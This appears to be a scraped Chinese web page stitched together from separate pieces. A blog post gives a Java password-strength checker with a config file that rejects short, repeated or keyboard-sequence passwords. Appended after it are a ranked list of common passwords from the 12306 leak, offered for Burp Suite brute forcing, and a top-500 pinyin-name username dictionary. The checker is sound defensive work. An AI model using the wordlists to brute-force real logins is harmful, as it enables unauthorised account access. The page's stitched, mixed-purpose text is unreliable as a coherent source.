精华内容
下载资源
问答
  • 包含1000W常用弱口令密码(数字类、拼音类、生日类等等), 仅供安全参考,请知悉
  • 密码弱口令字典完整

    2018-04-21 12:23:33
    密码弱口令字典完整,作为部分弱口令参考很有用的,有需要的朋友可以下载
  • 一是一定要修改Wifi管理后台的密码,二是最好能关注Wifi固件升级信息。 前些日子,一位程序员改了一个Telnet Wifi扫描脚本,经过两三天的扫描,积累了9万余条Wifi密码数据。遂针对扫描到的数据做一次简单的分析,...
  • webservice 如果默认为弱口令,很可能被上传病毒文件,此文档较详细的介绍了病毒的特性和病毒的查杀和防御问题。
  • wifi密码弱口令字典(很全)

    热门讨论 2014-08-29 16:31:50
    wifi密码 弱口令字典
  • 密码弱口令字典大全完整版

    热门讨论 2011-09-11 12:29:39
    密码弱口令字典大全完整版,很强很好用,很实用...
  • 前个10000常用弱密码弱口令
  • 更新至2019密码弱口令字典,国内最全最新的简单密码字符。 文件过大,请不要直接打开文档!!!《请使用编辑器打开》
  • JAVA 密码弱口令检测机制

    千次阅读 2020-04-21 10:38:09
    JAVA 密码弱口令检测机制 最近做项目需求,遇到客户要求对密码弱口令,进行检查和判断,具体要求如下: 1,口令长度应大于等于8个字符, 2,口令应由大写、小写、数字、特殊字符三者及以上组成 3,不得使用一串...

    JAVA 密码弱口令检测机制

    最近做项目需求,遇到客户要求对密码弱口令,进行检查和判断,具体要求如下:
    	1,口令长度应大于等于8个字符,
    	2,口令应由大写、小写、数字、特殊字符三者及以上组成
    	3,不得使用一串相同的数字或字母组成
    	4,不能键盘连续序列集合
    	5.,,,,,,
    	废话不多说,直接上代码:
    	首先配置文件,便于以后修改:
    
    
    #保护系统级别 系统级别分为二级系统和三级系统
    #当systemGrade不为2或者3时,系统默认使用系统级别2的规则
    #当systemGrade设置为2或者3时,其他选项若未配置,则按照默认值处理,具体默认值信息见每一项说明
    systemGrade=2
    
    #检测密码口令长度
    #当checkPasswordLength为disable时,下面两项设置无效
    #其他检测功能设置为disable时,对应设置项设置数据无效
    #当系统级别为2或3时,checkPasswordLength默认为enable
    #当系统级别为2或3时,limitPassMinLength默认为8,limitPassMaxLength默认为20
    #是否检测密码口令长度,如为enable则检测,如为disable则不检测,如为空,
    checkPasswordLength=enable
    #允许密码口令最小长度
    limitPassMinLength=8
    #允许密码口令最大长度,如为空,则不设置上限
    limitPassMaxLength=20
    
    #是否包含数字、小写字母、大写字母、特殊符号
    #当设置checkContainUpperLowerCase为enable时,区分大小写
    #当系统级别为2时:checkContainDigit默认为enable,checkContainUpperLowerCase默认为disable
    #当系统级别为2时,checkContainLowerCase默认为disable,checkContainUpperCase默认为disable
    #当系统级别为2时,checkContainSpecialChar默认为disable
    #当系统级别为3时:checkContainDigit默认为enable,checkContainUpperLowerCase默认为disable
    #当系统级别为3时,checkContainLowerCase默认为disable,checkContainUpperCase默认为disable
    #当系统级别为3时,checkContainSpecialChar默认为enable
    #是否检测包含数字
    checkContainDigit=enable
    #是否检测包含大小写字母,区分密码口令大小写
    checkContainUpperLowerCase = enable
    #是否检测包含小写字母
    checkContainLowerCase = enable
    #是否检测包含大写字母
    checkContainUpperCase = enable
    #是否检测包含特殊符号
    checkContainSpecialChar=enable
    #支持自定义特殊符号集合
    specialCharSet="!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
    
    #检测键盘按键连续 比如qwer、1qaz、0okm等
    #允许横向最大连续num为7,最小为3
    #允许斜向最大连续num为4,最小为3
    #当系统级别为2时:checkHorizontalKeySequential默认为enable,horizontalKeyLimitNum默认为4
    #当系统级别为2时,checkSlopeKeySequential默认为enable,slopeKeyLimitNum默认为4
    #当系统级别为3时:checkHorizontalKeySequential默认为enable,horizontalKeyLimitNum默认为3
    #当系统级别为3时,checkSlopeKeySequential默认为enable,slopeKeyLimitNum默认为3
    #是否检测键盘横向连续 
    checkHorizontalKeySequential=enable
    #允许键盘横向连续最小数值,如为空,则设置为默认值
    horizontalKeyLimitNum=3
    #是否检测键盘斜向连续
    checkSlopeKeySequential=enable
    #允许键盘斜向连续最小数值,如为空,则设置为默认值
    slopeKeyLimitNum=3
    
    #检测逻辑位置连续 比如1234、abcd等
    #当系统级别为2时,checkLogicSequential默认为enable,logicLimitNum默认为4
    #当系统级别为3时,checkLogicSequential默认为enable,logicLimitNum默认为3
    #是否检测逻辑位置连续
    checkLogicSequential=enable
    #允许逻辑位置连续最小数值,如为空,则设置为默认值
    logicLimitNum=3
    
    #检测相邻字符相同 比如aaaa、2222、@@@@等
    #当系统级别为2时,checkSequentialCharSame默认为enable,sequentialCharNum默认为4
    #当系统级别为3时,checkSequentialCharSame默认为enable,sequentialCharNum默认为3
    #是否检测相邻字符相同
    checkSequentialCharSame=enable
    #允许相邻位置相同最小连续数,如为空,则设置为默认值
    sequentialCharNum=3
    
    

    其次增加一个配置类:

    package com.soft.base.web.tools;
    
    import java.io.BufferedInputStream;
    import java.io.FileInputStream;
    import java.io.InputStream;
    import java.util.Iterator;
    import java.util.Properties;
    
    /**
     * @description : 密码安全策略,杜绝弱口令
     * @author      : SXY
     * @date        : 2020-04-16上午17:16:50
     * @version     : 1.0
     *
     */
    public class PwdSecurityConfig {
        /**
         * 密码口令检测对应系统等级
         */
        public static String SYSTEM_GRADE  = ReadResource.getString("password","systemGrade");
    
        /**
         * 是否检测密码口令长度标识
         */
        public static String CHECK_PASSWORD_LENGTH = ReadResource.getString("password","checkPasswordLength");
        /**
         * 密码最小长度,默认为8
         */
        public static String MIN_LENGTH = ReadResource.getString("password","limitPassMinLength");
        /**
         * 密码最大长度,默认为20
         */
        public static String MAX_LENGTH = ReadResource.getString("password","limitPassMaxLength");
    
        /**
         * 是否包含数字
         */
        public static String CHECK_CONTAIN_DIGIT = ReadResource.getString("password","checkContainDigit");
        /**
         * 是否区分大小写
         */
        public static String CHECK_DISTINGGUISH_CASE = ReadResource.getString("password","checkContainUpperLowerCase");
        /**
         * 是否包含小写字母
         */
        public static String CHECK_LOWER_CASE = ReadResource.getString("password","checkContainLowerCase");
        /**
         * 是否包含大写字母
         */
        public static String CHECK_UPPER_CASE = ReadResource.getString("password","checkContainUpperCase");
        /**
         * 是否包含特殊符号
         */
        public static String CHECK_CONTAIN_SPECIAL_CHAR = ReadResource.getString("password","checkContainSpecialChar");
        /**
         * 默认的特殊符号集合
         */
        public static String DEFAULT_SPECIAL_CHAR="!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~";
        /**
         * 配置中的特殊符号集合
         */
        public static String SPECIAL_CHAR  = ReadResource.getString("password","specialCharSet");
    
        /**
         * 是否检测键盘按键横向连续
         */
        public static String CHECK_HORIZONTAL_KEY_SEQUENTIAL  = ReadResource.getString("password","checkHorizontalKeySequential");
        /**
         * 键盘物理位置横向不允许最小的连续个数
         */
        public static String LIMIT_HORIZONTAL_NUM_KEY = ReadResource.getString("password","horizontalKeyLimitNum");
        /**
         * 是否检测键盘按键斜向连续
         */
        public static String CHECK_SLOPE_KEY_SEQUENTIAL = ReadResource.getString("password","checkSlopeKeySequential");
        /**
         * 键盘物理位置斜向不允许最小的连续个数
         */
        public static String LIMIT_SLOPE_NUM_KEY = ReadResource.getString("password","slopeKeyLimitNum");
    
        /**
         * 是否检测逻辑位置连续
         */
        public static String CHECK_LOGIC_SEQUENTIAL = ReadResource.getString("password","checkLogicSequential");
        /**
         * 密码口令中字符在逻辑位置上不允许最小的连续个数
         */
        public static String LIMIT_LOGIC_NUM_CHAR = ReadResource.getString("password","logicLimitNum");
    
        /**
         * 是否检测连续字符相同
         */
        public static String CHECK_SEQUENTIAL_CHAR_SAME = ReadResource.getString("password","checkSequentialCharSame");
        /**
         * 密码口令中相同字符不允许最小的连续个数
         */
        public static String LIMIT_NUM_SAME_CHAR = ReadResource.getString("password","sequentialCharNum");
    
        /**
         * 键盘横向方向规则
         */
        public static String[] KEYBOARD_HORIZONTAL_ARR = {
                "01234567890",
                "qwertyuiop",
                "asdfghjkl",
                "zxcvbnm",
        };
        /**
         * 键盘斜线方向规则
         */
        public static String[] KEYBOARD_SLOPE_ARR = {
                "1qaz",
                "2wsx",
                "3edc",
                "4rfv",
                "5tgb",
                "6yhn",
                "7ujm",
                "8ik,",
                "9ol.",
                "0p;/",
                "=[;.",
                "-pl,",
                "0okm",
                "9ijn",
                "8uhb",
                "7ygv",
                "6tfc",
                "5rdx",
                "4esz"
        };
        static {
            try{
                if("2".equals(SYSTEM_GRADE) || "3".equals(SYSTEM_GRADE) ) {
    
                    if("".equals(CHECK_PASSWORD_LENGTH)){
                        CHECK_PASSWORD_LENGTH = "enable";
                        MIN_LENGTH = "8";
                        MAX_LENGTH = "20";
                    }
                    if("".equals(CHECK_CONTAIN_DIGIT)) {
                        CHECK_CONTAIN_DIGIT = "enable";
                    }
                    if("".equals(CHECK_DISTINGGUISH_CASE)) {
                        CHECK_DISTINGGUISH_CASE = "disable";
                    }
                    if("".equals(CHECK_LOWER_CASE)) {
                        CHECK_LOWER_CASE = "enable";
                    }
                    if("".equals(CHECK_UPPER_CASE)) {
                        CHECK_UPPER_CASE = "enable";
                    }
                    if("".equals(CHECK_CONTAIN_SPECIAL_CHAR)) {
                        if("2".equals(SYSTEM_GRADE)) {
                            CHECK_CONTAIN_SPECIAL_CHAR = "disable";
                        }else{
                            CHECK_CONTAIN_SPECIAL_CHAR = "enable";
                            if("".equals(SPECIAL_CHAR)) {
                                SPECIAL_CHAR = DEFAULT_SPECIAL_CHAR;
                            }
                        }
                    }
    
                    if("".equals(CHECK_HORIZONTAL_KEY_SEQUENTIAL)) {
                        CHECK_HORIZONTAL_KEY_SEQUENTIAL = "enable";
                        if("2".equals(SYSTEM_GRADE)) {
                            LIMIT_HORIZONTAL_NUM_KEY = "4";
                        }else{
                            LIMIT_HORIZONTAL_NUM_KEY = "3";
                        }
                    }
    
                    if("".equals(CHECK_SLOPE_KEY_SEQUENTIAL)) {
                        CHECK_SLOPE_KEY_SEQUENTIAL = "enable";
                        if("2".equals(SYSTEM_GRADE)) {
                            LIMIT_SLOPE_NUM_KEY = "4";
                        }else{
                            LIMIT_SLOPE_NUM_KEY = "3";
                        }
                    }
    
                    if("".equals(CHECK_LOGIC_SEQUENTIAL)) {
                        CHECK_LOGIC_SEQUENTIAL = "enable";
                        if("2".equals(SYSTEM_GRADE)) {
                            LIMIT_LOGIC_NUM_CHAR = "4";
                        }else{
                            LIMIT_LOGIC_NUM_CHAR = "3";
                        }
    
                    }
                    if("".equals(CHECK_SEQUENTIAL_CHAR_SAME)) {
                        CHECK_SEQUENTIAL_CHAR_SAME = "enable";
                        if("2".equals(SYSTEM_GRADE)) {
                            LIMIT_NUM_SAME_CHAR = "4";
                        }else{
                            LIMIT_NUM_SAME_CHAR = "3";
                        }
                    }
                }else{
                    SYSTEM_GRADE = "3";
                    CHECK_PASSWORD_LENGTH = "enable";
                    MIN_LENGTH = "8";
                    MAX_LENGTH = "20";
                    CHECK_CONTAIN_DIGIT = "enable";
                    CHECK_LOWER_CASE = "enable";
                    CHECK_UPPER_CASE = "enable";
                    CHECK_CONTAIN_SPECIAL_CHAR = "enable";
                    CHECK_HORIZONTAL_KEY_SEQUENTIAL = "enable";
                    LIMIT_HORIZONTAL_NUM_KEY = "3";
                    CHECK_SLOPE_KEY_SEQUENTIAL = "enable";
                    LIMIT_SLOPE_NUM_KEY = "3";
                    CHECK_LOGIC_SEQUENTIAL = "enable";
                    LIMIT_LOGIC_NUM_CHAR = "3";
                    CHECK_SEQUENTIAL_CHAR_SAME = "enable";
                    LIMIT_NUM_SAME_CHAR = "3";
                }
            }catch(Exception e){
                System.out.println(e);
            }
        }
    }
    
    

    然后增加一个工具类:

    package com.soft.base.web.tools;
    /**
     * @description : 密码安全策略,杜绝弱口令
     * @author      : SXY
     * @date        : 2020-04-16上午17:16:50
     * @version     : 1.0
     *
     */
    public class CheckPwdUtils {
        /**
         * @brief   检测密码中字符长度
         * @param[in] password            密码字符串
         * @return  符合长度要求 返回true
         */
        public static boolean checkPasswordLength(String password) {
            boolean flag =false;
    
            if("".equals(PwdSecurityConfig.MAX_LENGTH)) {
                if (password.length() >= Integer.parseInt(PwdSecurityConfig.MIN_LENGTH)) {
                    flag = true;
                }
            }else{
                if (password.length() >= Integer.parseInt(PwdSecurityConfig.MIN_LENGTH) &&
                        password.length() <= Integer.parseInt(PwdSecurityConfig.MAX_LENGTH)) {
                    flag = true;
                }
            }
            return flag;
        }
    
        /**
         * @brief   检测密码中是否包含数字
         * @param[in] password            密码字符串
         * @return  包含数字 返回true
         */
        public static boolean checkContainDigit(String password) {
            char[] chPass = password.toCharArray();
            boolean flag = false;
            int num_count = 0;
    
            for (int i = 0; i < chPass.length; i++) {
                if (Character.isDigit(chPass[i])) {
                    num_count++;
                }
            }
    
            if (num_count >= 1){
                flag = true;
            }
            return flag;
        }
    
        /**
         * @brief   检测密码中是否包含字母(不区分大小写)
         * @param[in] password            密码字符串
         * @return  包含字母 返回true
         */
        public static boolean checkContainCase(String password) {
            char[] chPass = password.toCharArray();
            boolean flag = false;
            int char_count = 0;
    
            for (int i = 0; i < chPass.length; i++) {
                if (Character.isLetter(chPass[i])) {
                    char_count++;
                }
            }
    
            if (char_count >= 1) {
                flag = true;
            }
            return flag;
        }
    
        /**
         * @brief   检测密码中是否包含小写字母
         * @param[in] password            密码字符串
         * @return  包含小写字母 返回true
         */
        public static boolean checkContainLowerCase(String password) {
            char[] chPass = password.toCharArray();
            boolean flag = false;
            int char_count = 0;
    
            for (int i = 0; i < chPass.length; i++) {
                if (Character.isLowerCase(chPass[i])) {
                    char_count++;
                }
            }
    
            if (char_count >= 1) {
                flag = true;
            }
            return flag;
        }
    
        /**
         * @brief   检测密码中是否包含大写字母
         * @param[in] password            密码字符串
         * @return  包含大写字母 返回true
         */
        public static boolean checkContainUpperCase(String password) {
            char[] chPass = password.toCharArray();
            boolean flag = false;
            int char_count = 0;
    
            for (int i = 0; i < chPass.length; i++) {
                if (Character.isUpperCase(chPass[i])) {
                    char_count++;
                }
            }
    
            if (char_count >= 1) {
                flag = true;
            }
            return flag;
        }
    
        /**
         * @brief   检测密码中是否包含特殊符号
         * @param[in] password            密码字符串
         * @return  包含特殊符号 返回true
         */
        public static boolean checkContainSpecialChar(String password) {
            char[] chPass = password.toCharArray();
            boolean flag = false;
            int special_count = 0;
    
            for (int i = 0; i < chPass.length; i++) {
                if (PwdSecurityConfig.SPECIAL_CHAR.indexOf(chPass[i]) != -1) {
                    special_count++;
                }
            }
    
            if (special_count >= 1){
                flag = true;
            }
            return flag;
        }
    
        /**
         * @brief   键盘规则匹配器 横向连续检测
         * @param[in] password            密码字符串
         * @return  含有横向连续字符串 返回true
         */
        public static boolean checkLateralKeyboardSite(String password) {
            String t_password = new String(password);
            //将所有输入字符转为小写
            t_password = t_password.toLowerCase();
            int n = t_password.length();
            /**
             * 键盘横向规则检测
             */
            boolean flag = false;
            int arrLen = PwdSecurityConfig.KEYBOARD_HORIZONTAL_ARR.length;
            int limit_num = Integer.parseInt(PwdSecurityConfig.LIMIT_HORIZONTAL_NUM_KEY) ;
    
            for(int i=0; i+limit_num<=n; i++) {
                String str = t_password.substring(i, i+limit_num);
                String distinguishStr = password.substring(i, i+limit_num);
    
                for(int j=0; j<arrLen; j++) {
                    String PwdSecurityConfigStr = PwdSecurityConfig.KEYBOARD_HORIZONTAL_ARR[j];
                    String revOrderStr = new StringBuffer(PwdSecurityConfig.KEYBOARD_HORIZONTAL_ARR[j]).reverse().toString();
    
                    //检测包含字母(区分大小写)
                    if ("enable".equals(PwdSecurityConfig.CHECK_DISTINGGUISH_CASE)) {
                        //考虑 大写键盘匹配的情况
                        String UpperStr = PwdSecurityConfig.KEYBOARD_HORIZONTAL_ARR[j].toUpperCase();
                        if((PwdSecurityConfigStr.indexOf(distinguishStr) != -1) || (UpperStr.indexOf(distinguishStr) != -1)) {
                            flag = true;
                            return flag;
                        }
                        //考虑逆序输入情况下 连续输入
                        String revUpperStr = new StringBuffer(UpperStr).reverse().toString();
                        if((revOrderStr.indexOf(distinguishStr) != -1) || (revUpperStr.indexOf(distinguishStr) != -1)) {
                            flag = true;
                            return flag;
                        }
                    }else {
                        if(PwdSecurityConfigStr.indexOf(str) != -1) {
                            flag = true;
                            return flag;
                        }
                        //考虑逆序输入情况下 连续输入
                        if(revOrderStr.indexOf(str) != -1) {
                            flag = true;
                            return flag;
                        }
                    }
                }
            }
            return flag;
        }
    
        /**
         * @brief   键盘规则匹配器 斜向规则检测
         * @param[in] password            密码字符串
         * @return  含有斜向连续字符串 返回true
         */
        public static boolean checkKeyboardSlantSite(String password) {
            String t_password = new String(password);
            t_password = t_password.toLowerCase();
            int n = t_password.length();
            /**
             * 键盘斜线方向规则检测
             */
            boolean flag = false;
            int arrLen = PwdSecurityConfig.KEYBOARD_SLOPE_ARR.length;
            int limit_num = Integer.parseInt(PwdSecurityConfig.LIMIT_SLOPE_NUM_KEY);
    
            for(int i=0; i+limit_num<=n; i++) {
                String str = t_password.substring(i, i+limit_num);
                String distinguishStr = password.substring(i, i+limit_num);
                for(int j=0; j<arrLen; j++) {
                    String PwdSecurityConfigStr = PwdSecurityConfig.KEYBOARD_SLOPE_ARR[j];
                    String revOrderStr = new StringBuffer(PwdSecurityConfig.KEYBOARD_SLOPE_ARR[j]).reverse().toString();
                    //检测包含字母(区分大小写)
                    if ("enable".equals(PwdSecurityConfig.CHECK_DISTINGGUISH_CASE)) {
    
                        //考虑 大写键盘匹配的情况
                        String UpperStr = PwdSecurityConfig.KEYBOARD_SLOPE_ARR[j].toUpperCase();
                        if((PwdSecurityConfigStr.indexOf(distinguishStr) != -1) || (UpperStr.indexOf(distinguishStr) != -1)) {
                            flag = true;
                            return flag;
                        }
                        //考虑逆序输入情况下 连续输入
                        String revUpperStr = new StringBuffer(UpperStr).reverse().toString();
                        if((revOrderStr.indexOf(distinguishStr) != -1) || (revUpperStr.indexOf(distinguishStr) != -1)) {
                            flag = true;
                            return flag;
                        }
                    }else {
                        if(PwdSecurityConfigStr.indexOf(str) != -1) {
                            flag = true;
                            return flag;
                        }
                        //考虑逆序输入情况下 连续输入
                        if(revOrderStr.indexOf(str) != -1) {
                            flag = true;
                            return flag;
                        }
                    }
                }
            }
            return flag;
        }
    
        /**
         * @brief   评估a-z,z-a这样的连续字符
         * @param[in] password            密码字符串
         * @return  含有a-z,z-a连续字符串 返回true
         */
        public static boolean checkSequentialChars(String password) {
            String t_password = new String(password);
            boolean flag = false;
            int limit_num = Integer.parseInt(PwdSecurityConfig.LIMIT_LOGIC_NUM_CHAR);
            int normal_count = 0;
            int reversed_count = 0;
    
            //检测包含字母(区分大小写)
            if ("enable".equals(PwdSecurityConfig.CHECK_DISTINGGUISH_CASE)) {
    
            }else{
                t_password = t_password.toLowerCase();
            }
            int n = t_password.length();
            char[] pwdCharArr = t_password.toCharArray();
    
            for (int i=0; i+limit_num<=n; i++) {
                normal_count = 0;
                reversed_count = 0;
                for (int j=0; j<limit_num-1; j++) {
                    if (pwdCharArr[i+j+1]-pwdCharArr[i+j]==1) {
                        normal_count++;
                        if(normal_count == limit_num -1){
                            return true;
                        }
                    }
    
                    if (pwdCharArr[i+j]-pwdCharArr[i+j+1]==1) {
                        reversed_count++;
                        if(reversed_count == limit_num -1){
                            return true;
                        }
                    }
                }
            }
            return flag;
        }
    
        /**
         * @brief   评估aaaa,1111这样的相同连续字符
         * @param[in] password            密码字符串
         * @return  含有aaaa,1111等连续字符串 返回true
         */
        public static boolean checkSequentialSameChars(String password) {
            String t_password = new String(password);
            int n = t_password.length();
            char[] pwdCharArr = t_password.toCharArray();
            boolean flag = false;
            int limit_num = Integer.parseInt(PwdSecurityConfig.LIMIT_NUM_SAME_CHAR);
            int count = 0;
            for (int i=0; i+limit_num<=n; i++) {
                count=0;
                for (int j=0; j<limit_num-1; j++) {
                    if(pwdCharArr[i+j] == pwdCharArr[i+j+1]) {
                        count++;
                        if (count == limit_num -1){
                            return true;
                        }
                    }
                }
            }
            return flag;
        }
    
        /**
         * @brief   评估密码中包含的字符类型是否符合要求
         * @param[in] password            密码字符串
         * @return  符合要求 返回true
         */
        public static boolean EvalPWD(String password) {
            if (password == null || "".equals(password)) {
                return false;
            }
            boolean flag = false;
    
            /**
             * 检测长度
             */
            String checkPasswordLength = PwdSecurityConfig.CHECK_PASSWORD_LENGTH;
            if ("enable".equals(PwdSecurityConfig.CHECK_PASSWORD_LENGTH)){
                flag = checkPasswordLength(password);
                if (!flag) {
                    return false;
                }
            }
            /**
             * 大小写,数字,特殊符号,满足其中三种即可
             */
            int i = 0;
            /**
             * 检测包含数字
             */
            if ("enable".equals(PwdSecurityConfig.CHECK_CONTAIN_DIGIT)){
                flag = checkContainDigit(password);
                if (flag) {
                    i++;
                }
            }
            /**
             * 检测包含字母(区分大小写)
             */
            if ("enable".equals(PwdSecurityConfig.CHECK_DISTINGGUISH_CASE)){
                //检测包含小写字母
                if ("enable".equals(PwdSecurityConfig.CHECK_LOWER_CASE)){
                    flag = checkContainLowerCase(password);
                    if (flag) {
                        i++;
                    }
                }
    
                //检测包含大写字母
                if ("enable".equals(PwdSecurityConfig.CHECK_UPPER_CASE)){
                    flag = checkContainUpperCase(password);
                    if (flag) {
                        i++;
                    }
                }
            }else {
                flag = checkContainCase(password);
                if (!flag) {
                    return false;
                }
            }
    
            /**
             * 检测包含特殊符号
             */
            if ("enable".equals(PwdSecurityConfig.CHECK_CONTAIN_SPECIAL_CHAR)){
                flag = checkContainSpecialChar(password);
                if (flag) {
                    i++;
                }
            }
            if(i<3){
                return false;
            }
    
            /**
             * 检测键盘横向连续
             */
            if ("enable".equals(PwdSecurityConfig.CHECK_HORIZONTAL_KEY_SEQUENTIAL)){
                flag = checkLateralKeyboardSite(password);
                if (flag) {
                    return false;
                }
            }
    
            /**
             * 检测键盘斜向连续
             */
            if ("enable".equals(PwdSecurityConfig.CHECK_SLOPE_KEY_SEQUENTIAL)){
                flag = checkKeyboardSlantSite(password);
                if (flag) {
                    return false;
                }
            }
    
            /**
             * 检测逻辑位置连续
             */
            if ("enable".equals(PwdSecurityConfig.CHECK_LOGIC_SEQUENTIAL)){
                flag = checkSequentialChars(password);
                if (flag) {
                    return false;
                }
            }
    
            /**
             * 检测相邻字符是否相同
             */
            if ("enable".equals(PwdSecurityConfig.CHECK_SEQUENTIAL_CHAR_SAME)){
                flag = checkSequentialSameChars(password);
                if (flag) {
                    return false;
                }
            }
            return true;
        }
    }
    
    

    最后 进行测试一下吧:

    		boolean b1 = CheckPwdUtils.EvalPWD(SYS_USER_PASS);
    		if(!b1){
    			System.out.println("对不起,该密码安全等级比较低,请修改");
    		}
    

    觉得文章有用的话,加个关注点个赞吧。

    展开全文
  • 包含TOP10000\TOP300000\400W常用密码
  • 弱口令密码

    2019-04-30 15:41:13
    内置内置90000多条使用频率最高的密码,是wifi密码破解或其他密码破解必备字典库。
  • 常用密码弱口令字典 常用中文姓名拼缩写字典 常用中文汉字字典 用户名字典
  • 弱口令密码 password top 10000,常用的10000个弱口令密码
  • 常见的8位纯数字和8位数字和字幕组合密码字典
  • 密码中包含有 123456 数字的,出现 3236 次密码中包含有 123 数字的,出现 11213 次密码中包含有 520 数字的,出现 4549 次密码中包含有 1314 数字的,出现 3113 次密码中包含有 aini 的,出现 877 次密码 出现次数-...

    以下是在 12306 泄露的密码中,使用次数最多的密码排行,大家在修改密码时候,尽量避免使用类似的规则。

    密码中包含有 123456 数字的,出现 3236 次

    密码中包含有 123 数字的,出现 11213 次

    密码中包含有 520 数字的,出现 4549 次

    密码中包含有 1314 数字的,出现 3113 次

    密码中包含有 aini 的,出现 877 次

    密码 出现次数

    ---------- --------

    123456 392

    a123456 282

    123456a 168

    5201314 161

    111111 157

    woaini1314 140

    qq123456 100

    123123 98

    000000 97

    1qaz2wsx 95

    1q2w3e4r 84

    qwe123 80

    7758521 76

    123qwe 68

    a123123 63

    123456aa 56

    woaini520 56

    woaini 52

    100200 52

    1314520 52

    woaini123 51

    123321 50

    q123456 49

    123456789 49

    123456789a 49

    5211314 48

    asd123 48

    a123456789 48

    z123456 47

    asd123456 47

    a5201314 45

    aa123456 44

    zhang123 42

    aptx4869 41

    123123a 40

    1q2w3e4r5t 37

    1qazxsw2 37

    5201314a 36

    1q2w3e 35

    aini1314 35

    31415926 34

    q1w2e3r4 34

    123456qq 34

    woaini521 34

    1234qwer 33

    a111111 33

    520520 33

    iloveyou 30

    abc123 29

    110110 29

    111111a 29

    123456abc 29

    w123456 28

    7758258 28

    123qweasd 26

    159753 26

    qwer1234 25

    a000000 25

    qq123123 24

    zxc123 24

    123654 24

    abc123456 23

    123456q 23

    qq5201314 22

    12345678 22

    000000a 21

    456852 21

    as123456 20

    1314521 20

    112233 19

    521521 19

    qazwsx123 19

    zxc123456 19

    abcd1234 19

    asdasd 19

    666666 19

    love1314 18

    QAZ123 18

    aaa123 18

    q1w2e3 18

    aaaaaa 18

    a123321 17

    123000 17

    11111111 17

    12qwaszx 17

    5845201314 16

    s123456 16

    nihao123 16

    caonima123 16

    zxcvbnm123 16

    wang123 16

    159357 16

    1A2B3C4D 16

    asdasd123 16

    584520 16

    753951 16

    147258 16

    1123581321 16

    110120 16

    qq1314520 15

    2014年的数据的,大家参考一些吧,有新的可以私信我一下。burpsuite爆破会用得到的。

    源出处

    TOP500名字字典

    zhangwei

    wangwei

    wangfang

    liwei

    linuo

    zhangmin

    lijing

    wangjing

    liuwei

    wangxiuying

    zhangli

    lixiuying

    wangli

    zhangjing

    zhangxiuying

    liqiang

    wangmin

    limin

    wanglei

    liuyang

    wangyan

    wangyong

    lijun

    zhangyong

    lijie

    zhangjie

    zhanglei

    wangqiang

    lijuan

    wangjun

    zhangyan

    zhangtao

    wangtao

    liyan

    wangchao

    liming

    liyong

    wangjuan

    liujie

    liumin

    lixia

    lili

    zhangjun

    wangjie

    zhangqiang

    wangxiulan

    wanggang

    wangping

    liufang

    zhangyan

    liuyan

    liujun

    liping

    wanghui

    wangyan

    chenjing

    liuyong

    liling

    liguiying

    wangdan

    ligang

    lidan

    liping

    wangpeng

    liutao

    chenwei

    zhanghua

    liujing

    litao

    wangguiying

    zhangxiulan

    lihong

    lichao

    liuli

    zhangguiying

    wangyulan

    liyan

    zhangpeng

    lixiulan

    zhangchao

    wangling

    zhangling

    lihua

    wangfei

    zhangyulan

    wangguilan

    wangying

    liuqiang

    chenxiuying

    liying

    lihui

    limei

    chenyong

    wangxin

    lifang

    zhangguilan

    libo

    yangyong

    wangxia

    liguilan

    wangbin

    lipeng

    zhangping

    zhangli

    zhanghui

    zhangyu

    liujuan

    libin

    wanghao

    chenjie

    wangkai

    chenli

    chenmin

    wangxiuzhen

    liyulan

    liuxiuying

    wangping

    wangping

    zhangbo

    liuguiying

    yangxiuying

    zhangying

    yangli

    zhangjian

    lijun

    lili

    wangbo

    zhanghong

    liudan

    lixin

    wangli

    yangjing

    liuchao

    zhangjuan

    yangfan

    liuyan

    liuying

    lixue

    lixiuzhen

    zhangxin

    wangjian

    liuyulan

    liuhui

    liubo

    zhanghao

    zhangming

    chenyan

    zhangxia

    chenyan

    yangjie

    wangshuai

    lihui

    wangxue

    yangjun

    zhangxu

    liugang

    wanghua

    yangmin

    wangning

    lining

    wangjun

    liuguilan

    liubin

    zhangping

    wangting

    chentao

    wangyumei

    wangnuo

    zhangbin

    chenlong

    lilin

    wangyuzhen

    zhangfengying

    wanghong

    lifengying

    yangyang

    liting

    zhangjun

    wanglin

    chenying

    chenjun

    liuxia

    chenhao

    zhangkai

    wangjing

    chenfang

    zhangting

    yangtao

    yangbo

    chenhong

    liuhuan

    wangyuying

    chenjuan

    chengang

    wanghui

    zhangying

    zhanglin

    zhangnuo

    zhangyumei

    wangfengying

    zhangyuying

    lihongmei

    liujia

    liulei

    zhangqian

    liupeng

    wangxu

    zhangxue

    liyang

    zhangxiuzhen

    wangmei

    wangjianhua

    liyumei

    wangying

    liuping

    yangmei

    lifei

    wangliang

    lilei

    lijianhua

    wangyu

    chenling

    zhangjianhua

    liuxin

    wangqian

    zhangshuai

    lijian

    chenlin

    liyang

    chenqiang

    zhaojing

    wangcheng

    zhangyuzhen

    chenchao

    chenliang

    liunuo

    wangqin

    zhanglanying

    zhanghui

    liuchang

    liqian

    yangyan

    zhangliang

    zhangjian

    liyun

    zhangqin

    wanglanying

    liyuzhen

    liuping

    chenguiying

    liuying

    yangchao

    zhangmei

    chenping

    wangjian

    liuhong

    zhaowei

    zhangyun

    zhangning

    yanglin

    zhangji

    gaofeng

    wangjianguo

    yangyang

    chenhua

    yanghua

    wangjianjun

    yangliu

    liuyang

    wangshuzhen

    yangfang

    lichunmei

    liujun

    wanghaiyan

    liuling

    chenchen

    wanghuan

    lidongmei

    zhanglong

    chenbo

    chenlei

    wangyun

    wangfeng

    wangxiurong

    wangrui

    liqin

    liguizhen

    chenpeng

    wangying

    liufei

    wangxiuyun

    chenming

    wangguirong

    lihao

    wangzhiqiang

    zhangdan

    lifeng

    zhanghongmei

    liufengying

    liyuying

    wangxiumei

    lijia

    wanglijuan

    chenhui

    zhangtingting

    zhangfang

    wangtingting

    wangyuhua

    zhangjianguo

    lilanying

    wangguizhen

    lixiumei

    chenyulan

    chenxia

    liukai

    zhangyuhua

    liuyumei

    liuhua

    libing

    zhanglei

    wangdong

    lijianjun

    liuyuzhen

    wanglin

    lijianguo

    liying

    yangwei

    liguirong

    wanglong

    liuting

    chenxiulan

    zhangjianjun

    lixiurong

    liuming

    zhoumin

    zhangxiumei

    lixuemei

    huangwei

    zhanghaiyan

    wangshulan

    lizhiqiang

    yanglei

    lijing

    litingting

    zhangxiurong

    liujianhua

    wanglili

    zhaomin

    chenyun

    lihaiyan

    zhangguirong

    zhangjing

